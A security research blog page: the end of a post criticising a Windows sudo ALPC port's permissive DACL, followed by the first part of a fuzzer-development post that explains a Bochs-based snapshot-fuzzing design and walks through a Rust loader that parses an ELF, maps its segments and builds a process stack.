PS> Format-NtSecurityDescriptor $sudo -Summary
<Owner> : BUILTIN\Administrators
<Group> : DESKTOP-9CF6144\None
<DACL>
Everyone: (Allowed)(None)(Connect|Delete|ReadControl)
NT AUTHORITY\RESTRICTED: (Allowed)(None)(Connect|Delete|ReadControl)
BUILTIN\Administrators: (Allowed)(None)(Full Access)
BUILTIN\Administrators: (Allowed)(None)(Full Access)
Yup, the DACL for the ALPC port grants access to the Everyone group. It would even allow restricted tokens with the RESTRICTED SID set, such as the Chromium GPU processes, to access the server. This is pretty poor security engineering and you have to wonder how this got approved to ship in such a prominent form.
The worst case scenario is if an admin uses this command on a shared system, such as a terminal server; then any other user on the system could get their administrator access. Oh well, such is life…
I will give Microsoft props though for writing the code in Rust, at least most of it. Of course, the likelihood that it would have had any useful memory corruption flaws is low even if they'd written it in ANSI C. This is a good lesson in why just writing in Rust isn't going to save you if you end up introducing logic bugs instead.
Silly EDR Bypasses and Where To Find Them
An Introduction to Bypassing User Mode EDR Hooks
Fuzzer Development 1: The Soul of a New Machine
Introduction && Credit to Gamozolabs
For a long time I've wanted to develop a fuzzer on the blog during my weekends and free time, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux kernel exploitation reasons, I've been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot-fuzz traditionally hard-to-fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don't naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.
One approach is to lobotomize the target such that you can isolate a small subset of the target that you find "interesting" and only fuzz that. That can look like a lot of things, such as ripping a small portion of a kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input-parsing routine out of a web browser and fuzzing just the parsing logic. This approach has its limits though: in an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this "interesting" target logic. This lobotomy approach reduces the amount of target state we can explore to a large degree. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.
Another approach is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot-fuzzing an entire virtual machine, we are able to fuzz complex targets such as a web browser or kernel in a way that lets us explore much more state. Nyx provides us with a way to snapshot-fuzz an entire virtual machine/system. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the "real world". Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But I think, given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.
And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer on top of it, I revisited gamozolabs' (Brandon Falk's) stream paper review of the Nyx paper. It's a great stream; the Nyx authors were present in Twitch chat, so there were some good back-and-forths, and the stream really highlights what an amazing utility Nyx is for fuzzing. But something else besides Nyx piqued my interest during the stream! Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot-fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.
This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:
- it is relatively simple in its design,
- it allows for almost endless introspection utilities to be added,
- it lends itself well to iterative development cycles,
- it can scale and be used on the servers I bought for fuzzing (but haven't used yet because I don't have a fuzzer!),
- it can fuzz the Linux Kernel,
- it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),
- it is pretty unique in its design compared to open source fuzzing tools that exist,
- it can be designed from scratch to work well with existing flexible tooling such as LibAFL,
- there is no source code available anywhere publicly, so I'm free to implement it from scratch the way I see fit,
- it can be made portable, i.e., there is nothing stopping us from running this fuzzer on Windows instead of just Linux,
- it will allow me to do a lot of low-level computing research and learning.
So all things considered, this seemed like the ideal project to implement on the blog, so I reached out to Gamozo to make sure he'd be OK with it, as I didn't want to be seen as clout-chasing off of his ideas; he was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content, and we're off to developing the fuzzer.
Also huge shoutout to @is_eqv and @ms_s3c, at least two of the Nyx authors, who are always super friendly and charitable with their time and answering questions. Some great people to have around.
Another huge shoutout to @Kharosx0 for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.
Misc
Please let me know if you find any programming errors or have some nitpicks with the code. I've tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also haven't really fleshed out how the repository will look, or what files will be called, or anything like that, so please be patient with the code quality. This is mostly for learning purposes, and at this point it is just a proof of concept of loading Bochs into memory to explain the first portion of the architecture.
I've decided to name the project "Lucid" for now, as a reference to lucid dreaming, since our fuzz target is in somewhat of a dream state being executed within a simulator.
Bochs
What is Bochs? Good question. Bochs is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, it's a JIT-less, smaller, less complex emulation tool similar to QEMU, but with far fewer use cases and far less performance. Instead of taking QEMU's approach of "let's emulate anything and everything and do it with good performance", Bochs has taken the approach of "let's emulate an entire x86 system 100% in software without worrying about performance for the most part". This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect many code changes or rapid development; the last release was over 2 years ago.
Fuzzer Architecture
This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a "fuzzer" process, which will execute Bochs, which in turn executes our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs, which contains the target and all of the target system's simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.
Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our "fuzzer" process. In an effort to isolate Bochs from the user's OS and kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly it should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system prevents Bochs from accessing any random-ish data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data, such as CPUID or something similar. I actually haven't given much thought to the latter yet, but syscalls I have a plan for. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.
Secondly, it also means that the entirety of Bochs' state will be contained within our sandbox, which should enable us to reset Bochs' state more easily than if it were a remote process. In a paradigm where Bochs executes as a normal Linux process, for example, resetting its state is not trivial and may require a heavy-handed approach such as page-table walking in the kernel for each fuzzing iteration, or something even worse.
So in general, this is how our fuzzing setup should look:
In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. For this, I've chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Let's dive into how that has been accomplished thus far.
Loading an ELF in Memory
So in order to make loading Bochs into memory as simple as possible, I've chosen to compile Bochs as a -static-pie ELF. This means that the built ELF has no expectations about where it is loaded. In its _start routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will just be to build and load a -static-pie test program and make sure we can do that correctly.
In order to make sure we have everything correctly implemented, weβll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
printf("Argument count: %d\n", argc);
printf("Args:\n");
for (int i = 0; i < argc; i++) {
printf(" -%s\n", argv[i]);
}
size_t iters = 0;
while (1) {
printf("Test alive!\n");
sleep(1);
iters++;
if (iters > 5) { return 0; }
}
}
Remember, at this point we don't sandbox our loaded program at all; all we're trying to do is load it into our fuzzer's virtual address space, jump to it, and make sure the stack and everything is correctly set up. So we could run into issues that aren't real issues if we jumped straight into executing Bochs at this point.
So compiling the test program and examining it with readelf -l, we can see that there is actually a DYNAMIC segment, likely because of the relocations that need to be performed during the aforementioned _start routine.
dude@lol:~/lucid$ gcc test.c -o test -static-pie
dude@lol:~/lucid$ file test
test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
dude@lol:~/lucid$ readelf -l test
Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000008158 0x0000000000008158 R 0x1000
LOAD 0x0000000000009000 0x0000000000009000 0x0000000000009000
0x0000000000094d01 0x0000000000094d01 R E 0x1000
LOAD 0x000000000009e000 0x000000000009e000 0x000000000009e000
0x00000000000285e0 0x00000000000285e0 R 0x1000
LOAD 0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
0x0000000000005350 0x0000000000006a80 RW 0x1000
DYNAMIC 0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
0x00000000000001b0 0x00000000000001b0 RW 0x8
NOTE 0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
0x0000000000000020 0x0000000000000020 R 0x8
NOTE 0x0000000000000300 0x0000000000000300 0x0000000000000300
0x0000000000000044 0x0000000000000044 R 0x4
TLS 0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
0x0000000000000020 0x0000000000000060 R 0x8
GNU_PROPERTY 0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
0x0000000000000020 0x0000000000000020 R 0x8
GNU_EH_FRAME 0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
0x0000000000001cbc 0x0000000000001cbc R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
GNU_RELRO 0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
0x0000000000003220 0x0000000000003220 R 0x1
Section to Segment mapping:
Segment Sections...
00 .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt
01 .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini
02 .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table
03 .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs
04 .dynamic
05 .note.gnu.property
06 .note.gnu.build-id .note.ABI-tag
07 .tdata .tbss
08 .note.gnu.property
09 .eh_frame_hdr
10
11 .tdata .init_array .fini_array .data.rel.ro .dynamic .got
So what portions of this ELF image do we actually care about for our loading purposes? We probably don't need most of this information to simply get the ELF loaded and running. At first, I didn't know what I needed, so I just parsed all of the ELF headers.
Keeping in mind that this ELF parsing code doesn't need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.
ELF Headers
I've written ELF parsing code before, but didn't really remember how it worked, so I had to relearn everything from Wikipedia: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Luckily, we're not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values, but ended up parsing the ELF header into the following data structure:
// Constituent parts of the Elf
#[derive(Debug)]
pub struct ElfHeader {
pub entry: u64,
pub phoff: u64,
pub shoff: u64,
pub phentsize: u16,
pub phnum: u16,
pub shentsize: u16,
pub shnum: u16,
pub shrstrndx: u16,
}
We really only care about a few of these struct members. For one, we definitely need to know entry; this is where we're supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about phoff. This is the offset into the ELF where we can find the base of the Program Header table, which is basically just an array of Program Headers. Along with phoff, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where phnum and phentsize come in handy, respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.
A single program header, i.e., a single entry in the array, can be synthesized into the following data structure:
#[derive(Debug)]
pub struct ProgramHeader {
pub typ: u32,
pub flags: u32,
pub offset: u64,
pub vaddr: u64,
pub paddr: u64,
pub filesz: u64,
pub memsz: u64,
pub align: u64,
}
These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about segments of type LOAD, as these are the ones we have to account for when loading the ELF image. Take our readelf output for example:
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000008158 0x0000000000008158 R 0x1000
LOAD 0x0000000000009000 0x0000000000009000 0x0000000000009000
0x0000000000094d01 0x0000000000094d01 R E 0x1000
LOAD 0x000000000009e000 0x000000000009e000 0x000000000009e000
0x00000000000285e0 0x00000000000285e0 R 0x1000
LOAD 0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
0x0000000000005350 0x0000000000006a80 RW 0x1000
We can see that there are 4 loadable segments. They also have several attributes we need to keep track of:
- Flags describes the memory permissions this segment should have; we have 3 distinct memory protection schemes: READ, READ | EXECUTE, and READ | WRITE
- Offset describes how far into the physical file contents we can expect to find this segment
- PhysAddr we don't much care about
- VirtAddr is the virtual address this segment should be loaded at; you can tell that the first segment's value for this is 0x0000000000000000, which means that it has no expectations about where it's to be loaded
- MemSiz is how large the segment should be in virtual memory
- Align describes how to align the segments in virtual memory
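Since the Flags field is just a bitmask (per the ELF spec: PF_X = 0x1, PF_W = 0x2, PF_R = 0x4), decoding it is a matter of testing bits. A quick standalone sketch, separate from the loader code shown later:

```rust
// Sketch: decode ELF program header p_flags into an rwx-style string.
// Bit values per the ELF specification: PF_X = 0x1, PF_W = 0x2, PF_R = 0x4.
fn decode_flags(flags: u32) -> String {
    let r = if flags & 0x4 != 0 { 'r' } else { '-' };
    let w = if flags & 0x2 != 0 { 'w' } else { '-' };
    let x = if flags & 0x1 != 0 { 'x' } else { '-' };
    format!("{}{}{}", r, w, x)
}

fn main() {
    println!("{}", decode_flags(0x4)); // R   -> "r--"
    println!("{}", decode_flags(0x5)); // R E -> "r-x"
    println!("{}", decode_flags(0x6)); // RW  -> "rw-"
}
```

This is the same mapping the loader later applies when translating segment flags into mprotect permissions.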
For our very simplistic use case of only loading a -static-pie ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.
Loading the ELF
Now that we've successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, I've chosen to only implement what's needed in a Linux environment, but there's no reason why we couldn't load this ELF into our memory if we happened to be a Windows userland process. That's kind of why this whole design is cool. At some point, maybe someone will want Windows support and we'll add it.
The first thing we need to do is calculate the size of the virtual memory that we need in order to load the ELF, based on the combined size of the segments that are marked LOAD. We also have to keep in mind that there is some padding after segments that aren't page-aligned, so to do this, I used the following logic:
// Read the executable file into memory
let data = read(BOCHS_IMAGE).map_err(|_| LucidErr::from(
"Unable to read binary data from Bochs binary"))?;
// Parse ELF
let elf = parse_elf(&data)?;
// We need to iterate through all of the loadable program headers and
// determine the size of the address range we need
let mut mapping_size: usize = 0;
for ph in elf.program_headers.iter() {
if ph.is_load() {
let end_addr = (ph.vaddr + ph.memsz) as usize;
if mapping_size < end_addr { mapping_size = end_addr; }
}
}
// Round the mapping up to a page
if mapping_size % PAGE_SIZE > 0 {
mapping_size += PAGE_SIZE - (mapping_size % PAGE_SIZE);
}
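The rounding step above is a common idiom; here is a standalone sketch of the same computation (PAGE_SIZE assumed to be 4 KiB here), also showing the equivalent bit-mask form that works whenever the page size is a power of two:

```rust
// Sketch: round a mapping size up to the next page boundary.
// PAGE_SIZE is assumed to be 4 KiB.
const PAGE_SIZE: usize = 0x1000;

fn round_up_to_page(size: usize) -> usize {
    // Equivalent to the modulo version in the loader; this form relies on
    // PAGE_SIZE being a power of two.
    (size + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}

fn main() {
    println!("{:#x}", round_up_to_page(0xc9a80)); // -> 0xca000
    println!("{:#x}", round_up_to_page(0x8000));  // already aligned -> 0x8000
}
```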
We iterate through all of the Program Headers in the parsed ELF and track the largest end_addr we see. This accounts for the page-alignment padding in between segments as well. And as you can see, we also page-align the last segment by rounding the total size up to the nearest page. At this point we know how much memory we need to mmap to hold the loadable ELF segments. We mmap a contiguous range of memory here:
// Call `mmap` to map memory into our process to hold all of the loadable
// program header contents in a contiguous range. Right now the perms will be
// generic across the entire range as PROT_WRITE,
// later we'll go back and `mprotect` them appropriately
fn initial_mmap(size: usize) -> Result<usize, LucidErr> {
// We don't want to specify a fixed address
let addr = LOAD_TARGET as *mut libc::c_void;
// Length is straight forward
let length = size as libc::size_t;
// Set the protections for now to writable
let prot = libc::PROT_WRITE;
// Set the flags, this is anonymous memory
let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;
// We don't have a file to map, so this is -1
let fd = -1 as libc::c_int;
// We don't specify an offset
let offset = 0 as libc::off_t;
// Call `mmap` and make sure it succeeds
let result = unsafe {
libc::mmap(
addr,
length,
prot,
flags,
fd,
offset
)
};
if result == libc::MAP_FAILED {
return Err(LucidErr::from("Failed to `mmap` memory for Bochs"));
}
Ok(result as usize)
}
So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file, of course, so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a memcpy from the file data in memory to the carved-out memory we just created. You can see that logic here:
let mut load_segments = Vec::new();
for ph in elf.program_headers.iter() {
if ph.is_load() {
load_segments.push((
ph.flags, // segment.0
ph.vaddr as usize, // segment.1
ph.memsz as usize, // segment.2
ph.offset as usize, // segment.3
ph.filesz as usize, // segment.4
));
}
}
After the segment metadata has been extracted, we can copy the contents over as well as call mprotect on each segment in memory so that its permissions perfectly match the Flags segment metadata we discussed earlier. That logic is here:
// Iterate through the loadable segments and change their perms and then
// copy the data over
for segment in load_segments.iter() {
// Copy the binary data over, the destination is where in our process
// memory we're copying the binary data to. The source is where we copy
// from, this is going to be an offset into the binary data in the file,
// len is going to be how much binary data is in the file, that's filesz
// This is going to be unsafe no matter what
let len = segment.4;
let dst = (addr + segment.1) as *mut u8;
let src = (elf.data[segment.3..segment.3 + len]).as_ptr();
unsafe {
std::ptr::copy_nonoverlapping(src, dst, len);
}
// Calculate the `mprotect` address by adding the mmap address plus the
// virtual address offset, we also mask off the last 0x1000 bytes so
// that we are always page-aligned as required by `mprotect`
let mprotect_addr = ((addr + segment.1) & !(PAGE_SIZE - 1))
as *mut libc::c_void;
// Get the length
let mprotect_len = segment.2 as libc::size_t;
// Get the protection
let mut mprotect_prot = 0 as libc::c_int;
if segment.0 & 0x1 == 0x1 { mprotect_prot |= libc::PROT_EXEC; }
if segment.0 & 0x2 == 0x2 { mprotect_prot |= libc::PROT_WRITE; }
if segment.0 & 0x4 == 0x4 { mprotect_prot |= libc::PROT_READ; }
// Call `mprotect` to change the mapping perms
let result = unsafe {
libc::mprotect(
mprotect_addr,
mprotect_len,
mprotect_prot
)
};
if result < 0 {
return Err(LucidErr::from("Failed to `mprotect` memory for Bochs"));
}
}
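As a quick sanity check on that bit mapping, here's the same translation pulled out into a standalone sketch. The constants use the standard Linux values for `PF_*` (ELF side) and `PROT_*` (mmap side), defined locally so the snippet doesn't need the `libc` crate:

```rust
// ELF program header flag bits (p_flags)
const PF_X: u32 = 0x1;
const PF_W: u32 = 0x2;
const PF_R: u32 = 0x4;
// mmap/mprotect protection bits on Linux
const PROT_READ: i32 = 0x1;
const PROT_WRITE: i32 = 0x2;
const PROT_EXEC: i32 = 0x4;

// Translate ELF segment flags into mprotect protection flags, the same
// mapping the loop above performs inline
fn flags_to_prot(p_flags: u32) -> i32 {
    let mut prot = 0;
    if p_flags & PF_X != 0 { prot |= PROT_EXEC; }
    if p_flags & PF_W != 0 { prot |= PROT_WRITE; }
    if p_flags & PF_R != 0 { prot |= PROT_READ; }
    prot
}

fn main() {
    // A typical .text segment is Read + Execute (p_flags = 0x5)
    assert_eq!(flags_to_prot(PF_R | PF_X), PROT_READ | PROT_EXEC);
    // A typical data segment is Read + Write (p_flags = 0x6)
    assert_eq!(flags_to_prot(PF_R | PF_W), PROT_READ | PROT_WRITE);
}
```

Note that the `PF_*` bit positions don't line up with the `PROT_*` ones (write and read are swapped), which is why the per-bit checks are needed instead of passing `p_flags` straight through.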
After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we have to first set up a stack for the new "process", which I learned was a huge pain.
Setting Up a Stack for Bochs
I spent a lot of time on this and there actually might still be bugs! This was the hardest part I'd say, as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: https://articles.manugarg.com/aboutelfauxiliaryvectors.
Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:
position content size (bytes) + comment
------------------------------------------------------------------------
stack pointer -> [ argc = number of args ] 4
[ argv[0] (pointer) ] 4 (program name)
[ argv[1] (pointer) ] 4
[ argv[..] (pointer) ] 4 * x
[ argv[n - 1] (pointer) ] 4
[ argv[n] (pointer) ] 4 (= NULL)
[ envp[0] (pointer) ] 4
[ envp[1] (pointer) ] 4
[ envp[..] (pointer) ] 4
[ envp[term] (pointer) ] 4 (= NULL)
[ auxv[0] (Elf32_auxv_t) ] 8
[ auxv[1] (Elf32_auxv_t) ] 8
[ auxv[..] (Elf32_auxv_t) ] 8
[ auxv[term] (Elf32_auxv_t) ] 8 (= AT_NULL vector)
[ padding ] 0 - 16
[ argument ASCIIZ strings ] >= 0
[ environment ASCIIZ str. ] >= 0
(0xbffffffc) [ end marker ] 4 (= NULL)
(0xc0000000) < bottom of stack > 0 (virtual)
------------------------------------------------------------------------
When we pass arguments to a process on the command line like `ls / -laht`, the Linux OS has to load the `ls` ELF into memory and create its environment. In this example, we passed a couple of argument values to the process as well, `/` and `-laht`. The way the OS passes these arguments to the process is on the stack via the argument vector, or `argv` for short, which is an array of string pointers. The number of arguments is represented by the argument count, or `argc`. The first member of `argv` is usually the name of the executable that was passed on the command line, so in our example it would be `ls`. As you can see, the first thing on the stack (the top of the stack, which sits at the lower end of the stack's address range) is `argc`, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is `NULL`-terminated at the end.
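As a rough sketch of that layout (mine, not code from the fuzzer), here's the top of the stack for `ls / -laht` packed into a vector of `u64` slots, with made-up addresses standing in for the real string pointers:

```rust
// Build the argc/argv portion of the stack: argc first, then one
// pointer per argument, then the NULL terminator
fn build_argv_area(string_ptrs: &[u64]) -> Vec<u64> {
    let mut area = Vec::new();
    area.push(string_ptrs.len() as u64); // argc
    area.extend_from_slice(string_ptrs); // argv[0..n]
    area.push(0);                        // argv[n] = NULL terminator
    area
}

fn main() {
    // Fake addresses for the strings "ls", "/", "-laht"
    let area = build_argv_area(&[0x7fff_1000, 0x7fff_1008, 0x7fff_1010]);
    assert_eq!(area[0], 3);               // argc = 3 sits at the top
    assert_eq!(*area.last().unwrap(), 0); // pointer array is NULL-terminated
}
```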
After that, we have a similar data structure with the `envp` array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command `show environment`. The environment variables are usually in the form "KEY=VALUE"; for instance, on my machine the key-value pair for the language environment variable is `"LANG=en_US.UTF-8"`. For our purposes, we can ignore the environment variables. This vector is also `NULL`-terminated.
Next is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. The auxiliary entries in the vector are 16 bytes apiece. They comprise a key and a value, just like our environment variable entries, but here both are basically `u64` values. For the `test` program, we can actually dump the auxiliary information by using `info aux` under GDB.
gef➤  info aux
33 AT_SYSINFO_EHDR System-supplied DSO's ELF header 0x7ffff7f2e000
51 ??? 0xe30
16 AT_HWCAP Machine-dependent CPU capability hints 0x1f8bfbff
6 AT_PAGESZ System page size 4096
17 AT_CLKTCK Frequency of times() 100
3 AT_PHDR Program headers for program 0x7ffff7f30040
4 AT_PHENT Size of program header entry 56
5 AT_PHNUM Number of program headers 12
7 AT_BASE Base address of interpreter 0x0
8 AT_FLAGS Flags 0x0
9 AT_ENTRY Entry point of program 0x7ffff7f39f50
11 AT_UID Real user ID 1000
12 AT_EUID Effective user ID 1000
13 AT_GID Real group ID 1000
14 AT_EGID Effective group ID 1000
23 AT_SECURE Boolean, was exec setuid-like? 0
25 AT_RANDOM Address of 16 random bytes 0x7fffffffe3b9
26 AT_HWCAP2 Extension of AT_HWCAP 0x2
31 AT_EXECFN File name of executable 0x7fffffffefe2 "/home/dude/lucid/test"
15 AT_PLATFORM String identifying platform 0x7fffffffe3c9 "x86_64"
0 AT_NULL End of vector 0x0
The keys are on the left, the values are on the right. For instance, on the stack we can expect the key `0x5` for `AT_PHNUM`, which describes the number of Program Headers, to be accompanied by `12` as the value. We can dump the stack and see this in action as well.
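To make the 16-byte pair encoding concrete, here's a small sketch (mine, not the fuzzer's code) that lays a couple of auxv entries out as back-to-back key/value `u64`s and parses them back, stopping at the `AT_NULL` terminator:

```rust
// A few auxv keys from the GDB dump above
const AT_PHNUM: u64 = 5;
const AT_HWCAP: u64 = 16;
const AT_NULL: u64 = 0;

// Walk the raw u64 slots two at a time, collecting (key, value) pairs
// until the AT_NULL entry terminates the vector
fn parse_auxv(raw: &[u64]) -> Vec<(u64, u64)> {
    raw.chunks(2)
        .map(|pair| (pair[0], pair[1]))
        .take_while(|&(key, _)| key != AT_NULL)
        .collect()
}

fn main() {
    // AT_PHNUM = 12, AT_HWCAP = 0x1f8bfbff, then the AT_NULL terminator
    let raw = [AT_PHNUM, 12, AT_HWCAP, 0x1f8bfbff, AT_NULL, 0];
    let entries = parse_auxv(&raw);
    assert_eq!(entries, vec![(AT_PHNUM, 12), (AT_HWCAP, 0x1f8bfbff)]);
}
```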
gef➤  x/400gx $rsp
0x7fffffffe0b0: 0x0000000000000001 0x00007fffffffe3d6
0x7fffffffe0c0: 0x0000000000000000 0x00007fffffffe3ec
0x7fffffffe0d0: 0x00007fffffffe3fc 0x00007fffffffe44e
0x7fffffffe0e0: 0x00007fffffffe461 0x00007fffffffe475
0x7fffffffe0f0: 0x00007fffffffe4a2 0x00007fffffffe4b9
0x7fffffffe100: 0x00007fffffffe4e5 0x00007fffffffe505
0x7fffffffe110: 0x00007fffffffe52e 0x00007fffffffe542
0x7fffffffe120: 0x00007fffffffe559 0x00007fffffffe56c
0x7fffffffe130: 0x00007fffffffe588 0x00007fffffffe59d
0x7fffffffe140: 0x00007fffffffe5b8 0x00007fffffffe5c5
0x7fffffffe150: 0x00007fffffffe5da 0x00007fffffffe60e
0x7fffffffe160: 0x00007fffffffe61d 0x00007fffffffe646
0x7fffffffe170: 0x00007fffffffe667 0x00007fffffffe674
0x7fffffffe180: 0x00007fffffffe67d 0x00007fffffffe68d
0x7fffffffe190: 0x00007fffffffe69b 0x00007fffffffe6ad
0x7fffffffe1a0: 0x00007fffffffe6be 0x00007fffffffeca0
0x7fffffffe1b0: 0x00007fffffffecc1 0x00007fffffffeccd
0x7fffffffe1c0: 0x00007fffffffecde 0x00007fffffffed34
0x7fffffffe1d0: 0x00007fffffffed63 0x00007fffffffed73
0x7fffffffe1e0: 0x00007fffffffed8b 0x00007fffffffedad
0x7fffffffe1f0: 0x00007fffffffedc4 0x00007fffffffedd8
0x7fffffffe200: 0x00007fffffffedf8 0x00007fffffffee02
0x7fffffffe210: 0x00007fffffffee21 0x00007fffffffee2c
0x7fffffffe220: 0x00007fffffffee34 0x00007fffffffee46
0x7fffffffe230: 0x00007fffffffee65 0x00007fffffffee7c
0x7fffffffe240: 0x00007fffffffeed1 0x00007fffffffef7b
0x7fffffffe250: 0x00007fffffffef8d 0x00007fffffffefc3
0x7fffffffe260: 0x0000000000000000 0x0000000000000021
0x7fffffffe270: 0x00007ffff7f2e000 0x0000000000000033
0x7fffffffe280: 0x0000000000000e30 0x0000000000000010
0x7fffffffe290: 0x000000001f8bfbff 0x0000000000000006
0x7fffffffe2a0: 0x0000000000001000 0x0000000000000011
0x7fffffffe2b0: 0x0000000000000064 0x0000000000000003
0x7fffffffe2c0: 0x00007ffff7f30040 0x0000000000000004
0x7fffffffe2d0: 0x0000000000000038 0x0000000000000005
0x7fffffffe2e0: 0x000000000000000c 0x0000000000000007
You can see that towards the end of the data, at `0x7fffffffe2d8`, we have the key `0x5`, and at `0x7fffffffe2e0` we have the value `0xc`, which is 12 in hex. We need some of these in order to load our ELF properly, as the ELF `_start` routine requires some of them to set up the environment. The ones I included on my stack were the following (they might not all be necessary):
- `AT_ENTRY`, which holds the program entry point,
- `AT_PHDR`, which is a pointer to the program header data,
- `AT_PHNUM`, which is the number of program headers,
- `AT_RANDOM`, which is a pointer to 16 bytes of random data, normally placed by the kernel, that serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information: I ended up with a NULL-ptr deref during my initial testing, then placed this auxv pair with a value of `0x4141414141414141` and ended up crashing trying to access that address. For our purposes, we don't really care that the stack canary values are cryptographically secure, so I just placed another pointer to the program entry, as that is guaranteed to exist,
- `AT_NULL`, which is used to terminate the auxiliary vector.
So with those values all accounted for, we now know all of the data we need to construct the program's stack.
Allocating the Stack
First, we need to allocate memory to hold the Bochs stack, since we will need to know the address it's mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we won't know the absolute addresses unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward, as I just used `mmap` the same way we did with the program segments. Right now I'm using a 1MB stack, which seems to be large enough.
Constructing the Stack Data
In my stack creation logic, I created the stack starting from the bottom and then inserted values on top of it. So the first value we place onto the stack is the "end-marker" from the diagram, which is just a `0u64` in Rust.
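`push_u64` itself isn't shown in the post; a plausible implementation, mirroring the insert-at-the-front behavior of `push_string` (so that index 0 is always the current top of the stack), would look like this sketch:

```rust
const U64_SIZE: usize = 8;

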